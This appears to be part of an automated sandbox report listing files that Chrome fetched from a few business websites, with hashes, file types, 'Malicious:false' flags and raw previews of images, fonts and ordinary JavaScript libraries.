                                              Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 404 (Not Found)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1000x800, components 3
                                              Category:dropped
                                              Size (bytes):105759
                                              Entropy (8bit):7.98436647993728
                                              Encrypted:false
                                              SSDEEP:1536:XplzHOYB9Qz5sQmS/B4WFUpITgImWffyHmn1w2Tt6ZuecBS6y4Anye/Pv:ZB6zqe4+UpITDmWfam1wOngXnt
                                              MD5:A3DE0F294F6CD949B1E75B79371BF06B
                                              SHA1:F3F5A90D1ED39F26C703ED81A3A36E178A7CB0C7
                                              SHA-256:BEADAAC8AC49E4C8CD499619CC2D34C7DF62FF5B04714DAEF356FECA9E79CD66
                                              SHA-512:ECD0249BADE8FB79C74F0C0C52B7BC9C01AFD6AD2DEA58BC32F201DDF1FD2F0263014E7C71FBD023FF4C5DE3F5BA4B7ACA112B23AAA2BA13FAB5A0286A35DA08
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:48F32827934311ED9225BF14C06F67D5" xmpMM:DocumentID="xmp.did:48F32828934311ED9225BF14C06F67D5"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:48F32825934311ED9225BF14C06F67D5" stRef:documentID="xmp.did:48F32826934311ED9225BF14C06F67D5"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............L....c..............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Web Open Font Format (Version 2), TrueType, length 15340, version 1.0
                                              Category:downloaded
                                              Size (bytes):15340
                                              Entropy (8bit):7.983406336508752
                                              Encrypted:false
                                              SSDEEP:384:F2gPJde0V2iGrQyD8b3k/tigCdeNqOUd47SH0tsGm:4gPVV2NQE8b3ldeNWH0Wb
                                              MD5:19B7A0ADFDD4F808B53AF7E2CE2AD4E5
                                              SHA1:81D5D4C7B5035AD10CCE63CF7100295E0C51FDDA
                                              SHA-256:C912A9CE0C3122D4B2B29AD26BFE06B0390D1A5BDAA5D6128692C0BEFD1DFBBD
                                              SHA-512:49DA16000687AC81FC4CA9E9112BDCA850BB9F32E0AF2FE751ABC57A8E9C3382451B50998CEB9DE56FC4196F1DC7EF46BBA47933FC47EB4538124870B7630036
                                              Malicious:false
                                              Reputation:low
                                              URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfBBc4.woff2
                                              Preview:wOF2......;........d..;..........................d..z..J.`..L.Z..<.....\..`..^...x.6.$..6. ..|. ..8..z%......Q.{..q...FF.kd .8.(..d..).!C...Y.JA...r. ..GH8F......nW...".2&....2<..+C...p...b..SC.......J......z.-..Q..#6&1zUe../\...l.....<.....9s...E~.]B-..B.wY..o......Q..*A.F..1j.......-.`P% .. ,..@1.0..~.....WWW.d.u<c{..^.R.+..w....&.........A......+C....(.N.....0.~..0.J.;.Nu..7....]..m.H.....[h.GL3....?)....c.H...2.3.}y........SXI|..iVN'%E.D.W....r..<`....i....6;E$.....U.$j.@...._.......R2....WS...k.vz.R.'a9!^..*.N....h.._.....c.%."..S.2.16B...o.2}.pmU[.|.LI....2.....OWQLO1-....s..8.(...".|6...6R.. ..M-.zO.}w)..v..mXxX...c..3*#.+.v....F`.Z;.zQ.......r,....Yo.....g.h....+.....O.3Y..)Y.8.!....elX......._.3.}k~u.{ C..H.z..FP........@...d..)T.R...L.H.J.j.@..............$...E......y...3.b...I.h u.+%.HA.\..9..8..X.!....gx...].:..V..C...._..X..!....6..)...GM:E.....O.Z.*}k.;.T.k..D.k.O..D5.r..."......?..T.Q.A...CF...3g.5.Dn<.QPy..G..1.9..Q..0..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x640, components 3
                                              Category:downloaded
                                              Size (bytes):67181
                                              Entropy (8bit):7.978619022217026
                                              Encrypted:false
                                              SSDEEP:1536:al5Wtf7lr9h6dHtoyGirFn+bqHYKhhSHBVZM4baF:2if7lr2dNoer1+bqHujbaF
                                              MD5:53857508B0DB6CF72E4B117F4F9FF03A
                                              SHA1:BC34F7C7404894DFAD7D17AEBE862EC3DE1430EB
                                              SHA-256:522A5EDE3562BE0EC04ABCC096B039F2599E7B439F3F977647F2021CBB527B33
                                              SHA-512:807F3D9217B1610142C32D69773A175DEE8C3CF8CE7AD897181D23F835B6472A8C38DABEC0F70CBDFF69CDA4203D245BAAB17D03F5204144BA16B3B141264886
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/news/2/d80813aa6c19571f16d2a8796b810d49.jpeg
                                              Preview:......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm.............."................................................. ...K?SB....8Y..HrG+.Y$c.b...j....q.f.;..C.!.H....JR..B3#72...I.:I$.2gwtF......HB:...u.Z.....Y...Y.4..."cL.E,.{.w#..S$...Op.NfE!..".mWD..D.2LI."rD...`$.. ..\..5+.c...[.....~C7#r...}4..'4N.&d....9....9...._N..$I&I'D.......X....p..x ...U.R.!...W....$.?1.H.$.;$.:j..n........;.t....:t..N.I..:...qE..E.p.u.e.IH.Y.."...9'~[.4I......T............:t...I.D....:w\..B.1..QE.Q.}.&.I\.,.t...;.....a..&L.Y.J.?.9.........B4N..:I'gI....r't.\.9.f..8.(...f..3'M._LDY.......;2.fd.e.u...F.../A..:I:N.:N....4N..s....c.q.Q....$..$..j.".....]q:I2aafd.3z."'#rswt.Ozi.t..I$.:wD....'\......8.8..7...9....."."$d..\D.B...,.X...wr7'swu[...;.I.H.N.$H...'N.wwd..F0..*w&.IL..........?'.:t. B,.X..9;......C....I.N.N.$Ln..H.:.M.$.XD@#..vIe##t.f...F....$....'.O.''"F....r..t."N.$..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (1928), with no line terminators
                                              Category:dropped
                                              Size (bytes):1928
                                              Entropy (8bit):5.279338870681049
                                              Encrypted:false
                                              SSDEEP:48:YozhSHci0CwG54tKjCsvzsaZTSnM+n+HpBKs8wZPayS:3h+0CwG5HjCsrsaZTSnMWMpBKs/YyS
                                              MD5:FFA1C1C1632E8B1EF25AE00ED94385C0
                                              SHA1:D41504626FCBCD03E5B44B4C8F7D8B02D56EA1AF
                                              SHA-256:896688D966DE7F514E72B6C5B156DE3FB6DBFCD61436E6DB46CE3B0E4F52426A
                                              SHA-512:DF18CDE2A7C51BBC3BBB1496291CB8977E3E1D565F7316B85B94719FC4017AB3D3EDF1E18292D8314B902187E3EAC4477F8FF5C585DDB66520FDF7DB223696B0
                                              Malicious:false
                                              Reputation:low
                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.counterUp=t():e.counterUp=t()}(self,(function(){return(()=>{"use strict";var e={d:(t,n)=>{for(var o in n)e.o(n,o)&&!e.o(t,o)&&Object.defineProperty(t,o,{enumerable:!0,get:n[o]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t),r:e=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})}},t={};e.r(t),e.d(t,{default:()=>n,divideNumbers:()=>r});const n=(e,t={})=>{const{action:n="start",duration:i=1e3,delay:u=16}=t;if("stop"===n)return void o(e);if(o(e),!/[0-9]/.test(e.innerHTML))return;const l=r(e.innerHTML,{duration:i||e.getAttribute("data-duration"),delay:u||e.getAttribute("data-delay")});e._countUpOrigInnerHTML=e.innerHTML,e.innerHTML=l[0]||"&nbsp;",e.style.visibility="visible";const c=function(){e.innerHTML=l.shift
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):12654
                                              Entropy (8bit):7.593108088763322
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwk+G96a0mTWoW1M9odxlhTAWC3d+qXmASaOr:4YNg7kz6XmHeM+dpA53ZXVSaOr
                                              MD5:417C0D86B18D5E93BAD80FF050DC49EC
                                              SHA1:A75BC9CA320780B91B1C28154D371A2F91F188E0
                                              SHA-256:7B2932B3D18E44941E0AFCB4659745488FD47F7AB03CA6B620BE1CC9B3B8188D
                                              SHA-512:77724857513B666B3DF1CE67159C48535616539E068243A5E3E77EC96D33A03CACCEC9DBFC92E5F673D6752BC1E1CB11272333B07A739361EAD81DA51B97C80A
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/21/e52cb536878b838a18532a3d6b4f0b6a.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):57522
                                              Entropy (8bit):7.995273847882486
                                              Encrypted:true
                                              SSDEEP:1536:ODXP1COBUhabFpLmubsV5cwcncGVWO3VcIE:ODXNLBoabFpy3rcwcnYO36
                                              MD5:0B72E457F39BD498D6D899178522E211
                                              SHA1:DDD24758349E7A4E460D1C87271895A675DB40F2
                                              SHA-256:AD61A88A7009EB75C968C57462DD02F9062A5D8695566293F3F0A043F41F937B
                                              SHA-512:00FB7E1B97FFEE0DC6D83D46796D338423563D64DDB53D0B269531BADFD824C51EB9B3C132A3BFFF929EF16AFBC3BB68E49BCF1A23F7378FECBA299D70018E7F
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/menu2.webp
                                              Preview:RIFF....WEBPVP8X..............ALPH.K.......$5.|..=.....}...s_..8.....g..#........2......lO...4....0.....j........6)....1...hT#.'333.....2Ou^.O......*L......f.Y.4...;..%h......-....}V.IN....2e.k.+..4....*3.......V..s..+.....-.y"~.8'.J.]D.....4._..h.6....m.$.....S..4...>.....@......z/.V...K.......z....Z.m.m....x.i.......n/....E..?@..}....1.......+^...;=..w..+..g..x.w~...~..;H(..wzl...wo.(..+H..k.W...g.a....+^...]T.u.^......L...]O>N....5...c....n..d..n<&./..2J.}.l.i~)...h..s....=...>.+.|......94.L0t=7B....I.Y....../...^..T....\.`,).r...2..F. G....&jl+Z..@;..k|...y....?1..'f.s..>A...Is7..p..(0.l...,z.<1G{..[..q~P......_..v{,|.l.@...L...9..k...Pt}.7....w....]....k8.[..w.N.....f../...J(.=.[...].........>m..).._[7&.....O|.?.q.....|v0w..k|...M.'...I'..........~..NC....>.X.ht.........]....=n....U(...a3....Y.{. _.b..<X.+B..~m}<b(w.......B....g....x"...+..U.....w....8+6.>..k|M...@Q@...nu....@......>....fU.Bw.J.._@H]J5I.7~}.;...l
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3419
                                              Entropy (8bit):7.907684926063315
                                              Encrypted:false
                                              SSDEEP:96:6PdZaH0f+CAWg7DZLvBcz2bvfATqBlvwqsj6K/CZeWNB2G:2I0f+JWg7DZvBv4g526KfABJ
                                              MD5:19036E1149B076AE227E34BD1DC9143F
                                              SHA1:B01A9B01DB91B7905E967AF069AFEF9556B66BC4
                                              SHA-256:48C81A314A7A48F49BF0D90E13D7691453275612090D8C2F25703E49D275E185
                                              SHA-512:D9094B16E456AD2E52084F5A36DE33311837E9F7CD6517F4154C1608BAF3C885BA7895AA5AB76542EE18859E48EB09AF4C5A388F16788F483B1B86B83BA21884
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/seo.png
                                              Preview:.PNG........IHDR...d...d.....G<ef...APLTE....................................................B.;y....C......>0....I/...A..B.....?...9'.B8;...E;.:6..IF..../............J...<1.B6......6~..:*.C9....r.G=...P..M......2/......KE......{...........s..Az....51.......73.....3...`.........e^......_X.......SQ..I.id.................|...tl...X...........ts....l.......IDATh..WiW.Z..HN..$!D.B.).@.`..T..%"..Z........9 ...'7.te%.......|......>...._a.&....u...p.;.......@n...!.1......NA.....z.r4.._...2.%L....wI..p...2ON)/H..............(*.x..?H......$...2..........4........."..M3.+H4.i...<.MM...).)....0./b..:..S.........2..b..c....I..$.L...L.D...9".x.|..(.H.o+...$.<.}xx..9.H.,.._?_....H"...?.....`9P.y|..l6.J..z..+.v..!3.f...R(.....p4.....ph.p..h...`..._x..{qu<...Y.d.F.....f+V...0....'+.$....FW.dki+... aOX*.D.~L..N&.R...'.s.....a..Ys7..f...J..i.W......G......O9..._".d.....9%.p}.T;(.T...?...V.....%+....V1...Zs...6.(;.$./.......PymA"J.3..w...j..o8..H..wm.F.Q..M
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 600 x 400, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):25930
                                              Entropy (8bit):7.963106067492998
                                              Encrypted:false
                                              SSDEEP:384:I982UV5w3TPxTBubEvHCq6TOEFMrlcozOdbrwEj4zxK5JhF691OC6mHbTuBAwrj:WUCTRBuUf9EOr2UIbrwE+KPh0n6evwrj
                                              MD5:B6BE501EBF5622EA9D2C40002447DA02
                                              SHA1:D2639AEC2764BA3750724A53052E7E79BA0042D7
                                              SHA-256:4FDD0EE3D32154986F87326012D9CC2F143101854D630EDED1C811E6EF0F6CBA
                                              SHA-512:2ACDD78A5BCA5A19769D2089DBE19DB97E6E020B6B1D9B2CF49BF40B73F06411CF6D0240E23418EED0C677EDDC5F13F4068D3A81547FF7786E7DAD321D3FCC9D
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...X.........E......PLTELiq.................................CA@xz....!!!.......ppv...))).........100............"! ............XRP...............efjxx}.............zb..qJ:LB1...cS....Tiy?..pI, ..f...F4?.E6....tRNS...&....../@...{.g.H.$.....pHYs............... .IDATx...{.8..{.{.w..3...>...N..$$....w.d..HB...I......;O.J%.....O..O..O..O..O..O..O........^.YO}....,B.n'......3..:..z\..C....oi.buNz..f}J....e.....}..,\.>..?;.....o....Q...S..=...e{-Q.J..^..K......C.z.\}..4..o..Y.......p.boP..`mX.6~.m...=...... .^.U....bi.h."..}.[.(.'Y.i.q.*..h..F..............cb.......L.N.7..I...\..6..6H.?;|.-....9.q..6....5...>.X{...........RM".1c.|...~.ub;..g.....5.......6..'..m....G|.s.......L.\.6..._.h{......m......'.....M......q.g...#..P..7{?...zd.{l~.............w...19z.pb.}..\........G(.s......o.N...g./.<..0......v>..iw....l...'ZG..4..u..R..hg.p........M.}.Y...$.fN.6S.y.N:.....q\_.........f.......=....t..O.....X.y.....b.....\..7w...g
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):20031
                                              Entropy (8bit):4.657102504631418
                                              Encrypted:false
                                              SSDEEP:192:B5dArwvrUVzBSZyWyJ8UGicwtOTRqiS+SjUG3DcYthhmyMKHKQOOH4sykZN5IPeO:BuwuSZyWyJ8pcT3QuhvOOYsykqM0
                                              MD5:61524E1041A48EBFF8546E69B75648A3
                                              SHA1:33CCC4A5B42CEBB1267E4053228ABAA6A88F851C
                                              SHA-256:AE09E9BBB87B3DB844DA931CFAC1D2FB8B079E4950E953E674716127647564DA
                                              SHA-512:C80C96A4289E18E013D79B13CE107097DE1C5453C465702B1A3BE54BEC4DCC2C128F4106EEFFCFC941A12879BFD6E5405C33EB34BB103DAB4A0136A10717DFAA
                                              Malicious:false
                                              Reputation:low
                                              Preview:....document.addEventListener('click',function(e){.. // Hamburger menu.. if(e.target.classList.contains('hamburger-toggle')){.. e.target.children[0].classList.toggle('active');.. }.. })..........// all ------------------..function initBalkon() {.....// loader ------------------.. $(".loader").fadeOut(500, function() {.. $("#main").animate({.. opacity: "1".. }, 500);.. });...// Background image ------------------.. var a = $(".bg");.. a.each(function(a) {.. if ($(this).attr("data-bg")) $(this).css("background-image", "url(" + $(this).data("bg") + ")");.. });.. .// css ------------------.. function d() {.. // $(".alt").each(function() {.. // $(this).css({.. // "margin-top": -$(this).height() / 2 + "px".. // });.. // });.. var a = $(".social-wrap li"), b = a.length, c = $(".social-wrap ul").width();.. a.css({.. width: c / b - .5.. });.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 3240x2430, Scaling: [none]x[none], YUV color, decoders should clamp
                                              Category:downloaded
                                              Size (bytes):230362
                                              Entropy (8bit):7.9971622178218
                                              Encrypted:true
                                              SSDEEP:6144:EJTFtqNgqkc1JK/YOG0vsq5cEIeCQcJfz2ceklv8vwvdhwgcF9Z2cJ+BdoujxctL:zSyd8fsOmbwgm9Z7J+BdouFcJm7c
                                              MD5:932B29A45ABB7812BB6F2D7D24DAC67B
                                              SHA1:BED5808782082BAF58163796A6FEF91209AE72DC
                                              SHA-256:79C9563E3B20BE58FD8AAB4EEE3E5EDDF4F3FA0FB127A5CC1A4653F90E5AB7FA
                                              SHA-512:C71A0FEC7CB390D2BB8622931D0FB6D92645774894FE5E6664B9C34B33256BC64C1270B2F418C22BCD0C5E054B813B3C6DF12062A7E0B71018B674A5D409C533
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/portfolio/DMU.webp
                                              Preview:RIFF...WEBPVP8 ...0....*..~.>Q&.F...(!1.9...in..............^W`...}..........f.Umz.m.....\~..C......|'......_.3.?.g}.......k./....A...4~O.......~I.m...+..'..}h..wy......G...7..?.?..!.i...].....[...#..c.G..............n...r~$.x.4.2.....O....g.....G....}.........{......h.3......?5~..7......u>......?..;~k...w...S.?....~..s...~.g.W..C.w.g.?_..........$.......w.............._...?..............>L............_............O.?......d.?........o>....r.....?._._......h..s...p.G..h...kEj..Oy...W:.).>..j.O.|..*(..P.m.(..!.0QZ.u.S.~>...ZMh...AC:.).>..k...M.....6.u....i...Z'.G..h........L..u.S.}...Z...b!&.@..w.'..yV*%.?R.=.3.ey..6.u.S.}..'/|.O.=/..>.......P......J{.g2.I..6.....h..s......7E....J{.,P`....P...]?Z{8....rr...Ui.6.WN.D.k.+.T.sb.x.3...O.LV.G..a2..B..6.u.S.}....J{.|..p.$xh..s....v.....z..>...|....>......9....*..).H(.+.i......Z...D[KD.#}..43.....s...E..rQB.Pr.Q>.>n.G.U.,v.>#.Z.u.S.}.......a6.m....4..<..\.D....*..TO.e...{..]..:.).>............w.4
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):4402
                                              Entropy (8bit):7.943484504188233
                                              Encrypted:false
                                              SSDEEP:96:Tck4SD9wuFPruZn8a2sWlSs/Oyt7X1sqkv4hU/qI:TchuFTXlx/O01sqkv4az
                                              MD5:2A94457FD69AE6EF245FB66F6AEC07E4
                                              SHA1:C1A4883F0E54731525EADC94F109894563CB4DA8
                                              SHA-256:F9915C7C3A9731A9C0163E3C159846AB689814B14433C92B3F18FA82876BDE99
                                              SHA-512:5943C0A2A77D46EB136A6E0E4B7DB204D478BE7EBEE30BEE93944BE016D5C24DC9C76D10031FE378586AB1A03A8EF929361ECE17A8D4EE2A5F838CA7619F3FDE
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/e-seo.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE.........................WL......[....................BK{.UDz..FDu.......\^..QL..N......NV.KO.KPuDIl......[...........e............WM.U;U_....AX.UD...9.Wh.......ZRQ.....>Ad.........Zg......Tz....BF..VX.U..x>....JB...[..VZx...eh......to]kT.j...q|.TNd......XmjOk..mp....uy....^^..^W....[AJl..d]f.......^j...........^L.^E........A..}Yd..~N.Ti..K...b}.../.....J.....H..e........Qez...gIDATh...o.....;....8V..J..1...*#.^.........q..(H4H...W.~fm..9.=?...3;;3..3.D....A..,2...@.%..8..........l.1<.B.8.aY...XV...l.... ..w... pX1.\..W ...........G.H.(..=!..M.....Q..t<...O..x...P.+...Jz.V..6,.\.....0;.Q..{.D.uy'.4#.0.?.i.*..61l.C.W..v*.|.....R?o.....*W..a.C.. .vSB..L....j!....+....@.J..t.e.C..A.#I.?Q.e.^...pd....BDby...E1..........YE.. Xq.$...Q.....<..!.....0:...e.....Ax.E......T..B.^.0.[....A'[T......k.)......q...T..Bj..D.'..jQ/..u.,.;..")...S.q..x....k. .7.....Frl.2.?.`T..c......as?...x4.......'.4.4.?..`"..iP=...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (3537)
                                              Category:downloaded
                                              Size (bytes):52603
                                              Entropy (8bit):5.316331138717284
                                              Encrypted:false
                                              SSDEEP:1536:yYrF+dXpn0e+99D7FPUzHhbtjFnmFRbdwWRI32nB7PXAlnuhPisfq3ECoe5EzpGS:yYrF+d5n0e+99DJPUzHhbtjFnmFRbdwM
                                              MD5:F0A9F2F65F95B61810777606051EE17D
                                              SHA1:872BF131CB4BEFD0242339F072F2F9B9FBF8019F
                                              SHA-256:9CDF2602AC04F7E2BED582D4299C73D464FC4AB069E3AD5A20EE2B6635A015B8
                                              SHA-512:6823914507BA31E0F61B95CC53F09543C3C14E5530E9EF1B00338FBBD7C25D2E398F5F628DF4ED25D6FF88E0F8BEE506EFE62BA704778BA7CFF09AEC9579D9F0
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.gstatic.com/eureka/clank/117/cast_sender.js
                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var f,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},h="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},ca=ba(this),da=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&h(c,a,{configurable:!0,writable:!0,value:b})}};.da("Symbol",function(a){if(a)return a;var b=function(g,k){this.g=g;h(this,"description",{configurable:!0,writable:!0,value:k})};b.prototype.toStri
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 155x80, components 3
                                              Category:downloaded
                                              Size (bytes):10249
                                              Entropy (8bit):7.948034628681043
                                              Encrypted:false
                                              SSDEEP:192:ExpceXqNmVbCugY0KeD0fcdT/XQo6P/wl+7l1nzQkwwQ8oQrjgDcwdiALR4:ExdXimFM7KeofcdjQykzQRwQ2r0Iwv4
                                              MD5:7E1F653095BB20EC681506852DA17D05
                                              SHA1:63CE30DB87791E71FA029B9533192514ADBAB7ED
                                              SHA-256:F19FCF86A7DCD3D4A0231A9AFC795C98D34433C8259A2876C5310C1177B0279D
                                              SHA-512:619CB2D61CE4D91B9F967ECC29E5CB540D8EDA89C7C6E4F4249F1C95940F41166275E3498EE6C064868D90BB20EABE15C985C9F47DDCC4F9261B9E6B2599F4C3
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/6.jpg
                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................P.......................................................................................................!".Av.1#t..67w89q2u&..x...........................!.1..AQ".2#..a.B3t.78.r.s5u.6vqRbD......CS....9............?....i.4.cM1...Li.4..i.4.cM1...Li.4..i.4.cM1...Li.kp...fn.=l'..m=s.6,mE....Q..s.Z{t.....a.r$.".....J..q.......S.b...Y......<M...j..*f$.?E....=>.....1....RG.5.e..n./l.Wh.<.tP.(..T.v. .e...X....n$...@;b.t.Z;e@.?c..G.Pyw.k.)"..p.....L.d.pd...v...Iz..J..d..|V.3...Q..J.C2..OU~.....f.\...<.2YBh.P.{.W..D.5o..E...R.\w5?Mh...>p..PT.yGj...ZI.cc...o..ji...t..U....c.{..NW....v...].".......Lq...|....2...`;}.o..3..c-..K#...F.J....4.B...=h."[..$.<L.i..J..".1NtH..N..._..L.."....b...]Kj.3E#%}.I..t....\....VxR@.R..j.....,...4..i.4.cM1...Li.4..i.4.cMh....J.+.......V..r.a.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):5378
                                              Entropy (8bit):7.908415159229798
                                              Encrypted:false
                                              SSDEEP:96:PllcHitlIxv9vk7C1+I4wWHLihk/xZSRuCCpKmYnb+HjIecW3:UIIHUCD4wa3SRJCvY+IS3
                                              MD5:84D7BC34CED2F205F776CEE8C79C181C
                                              SHA1:40C6F8C6FAB2BCE145EFAEEFC6A948C7E71B1A36
                                              SHA-256:84CA4A564829EEC13EBA7B2123737CA1E7A397AA3EDB77CE311E0352FD8E029D
                                              SHA-512:E5ED2E7691CD277F41A43E66444673D957A42026459C25B77676353BABE959001911FA7F3B1DEC36C2B09442B4D8E509802ECA7C1FBD16D4A4D0074002533840
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/time-house.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):3640
                                              Entropy (8bit):7.752392676330971
                                              Encrypted:false
                                              SSDEEP:96:Q2rmW2ujbX4yWPfaDqIZ0xH5udZDiPRx+:CsNWPfaufxkNiPRx+
                                              MD5:42DA221D144643E221DFA53EC8CC6063
                                              SHA1:355252120438998CCFF910F511520FE9728CBAAA
